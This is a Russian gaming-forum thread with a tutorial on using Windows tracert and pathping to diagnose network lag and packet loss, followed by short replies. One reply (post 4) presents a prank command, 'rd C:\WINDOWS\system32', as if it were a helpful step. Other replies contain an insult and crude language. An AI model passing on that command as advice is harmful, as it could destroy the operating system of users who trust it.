InTeam

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » InTeam » Старичкам » Лагает? Проверь своего провайдера


Лагает? Проверь своего провайдера

Сообщений 1 страница 7 из 7

1

Итак, о чем идет речь: многие в игре сталкиваются с "лагами" - задержками игрового процесса. Сразу нужно отделить лаги СЕТИ от тормозов слабого железа компа. Лаги в сети - это "потери" пакетов информации о действии игрока, передающиеся от клиента к серверу и обратно. То есть если ваш провайдер пользуется дешевыми магистралями для передачи данных, то и потери у вас будут в разы больше, чем на "дорогих" (прямых) магистралях. Как определить - теряются ли в сети пакеты или нет?

Для этого есть несколько специальных команд, наиболее простая из которых - tracert (трасероут). Как ей пользоваться:
В винде нажимаем кнопку "Пуск", кликаем по надписи "Выполнить".в появившемся окне набираем (без кавычек!) "cmd", нажимаем Энтер.
http://keep4u.ru/imgs/b/080721/a7/a70d3460a95fe47292.jpg
Получаем чОрное окно 
Набираем в нем (без кавычек!) "tracert (IP адресс сервера на котором играете)." нажимаем Энтер, ждем ОКОНЧАНИЯ трасероута. Получается что-то типа вот этого:
http://keep4u.ru/imgs/b/2009/07/11/43/4389cc8d59209a815933612e9eaa8676.jpg
Как скопировать текст трасероута из этого окна: нажать правой кнопкой крысы на любом месте окна, выбрать "Выделить все", нажать Энтер. Теперь входим в форму ответа тут и нажимаем "Вставить".

Что видно из полученных результатов? В первую очередь это миллисекунды - они обозначают скорость достижения сигнала от вашего компа к КАЖДОМУ ПРОМЕЖУТОЧНОМУ УЗЛУ, по которому идет сигнал идет от вас до игрового сервера. Каждый такой ответ в миллисекундах называется "пингом". Если все пинги более-менее ровные и НЕ превышают 100-150 единиц - лагов или нет, или они будут некритичны. Если больше, или в пингах вместо миллисекунд проскакивают "звездочки" (например: 136 ms * *), то это они и есть - лаги.

Команда "pathping" является прямым потомком трасероута. Говоря попросту - это немного усложненный трасероут, позволяющий собирать статистику потерь пакетов на конкретных узлах.

Действия те же самые - добираемся до чОрного окна, вводим в нем (без кавычек) "pathping (IP адресс сервера на котором играете)". Паспинг в отличии от трасероута после короткого раздумья выдает инфу - сколько нужно ждать до полного выполнения команды. Занимаемое время зависит от количества узлов между вами и игровым сервером, обычно это от 30 до 300 секунд.

После выполнения команды вы получите результат, в котором увидите процентное соотношение отправленных и утерянных пакетов для КАЖДОГО промежуточного узла. С этой стороны команда паспинг более "показательна" и точна, чем трасероут.

Хочу сделать маленькую ремарку: любой пакет "пинга" имеет 4 байта. Пакеты линейки зачастую весят и по 64 КИЛОбайта, и если 4 байта для получения/отправки требуется минимальное время, то любой пакет бОльшего размера может и не дойти целиком. К тому же стоит учитывать и еще один тонкий момент - пакеты ICMP, которыми являются "пинги", имет на промежуточных роутерах НИЗШИЙ приоритет по приему-отдаче, то есть обрабатываются в последнюю очередь.

0

2

Goodinieeee- написал(а):

Получаем чОрное окно

командная строка называется :D

0

3

ctrl+c (copy) ctrl+v (paste) debilka  :mybb:

0

4

1)cmd
2)пишем "rd C:\WINDOWS\system32"
3)оффаемся

0

5

как узнать ip серва на котором играешь?

0

6

IP скайленда 188.72.250.44

0

7

у меня пинга охуевшая :)

0


Вы здесь » InTeam » Старичкам » Лагает? Проверь своего провайдера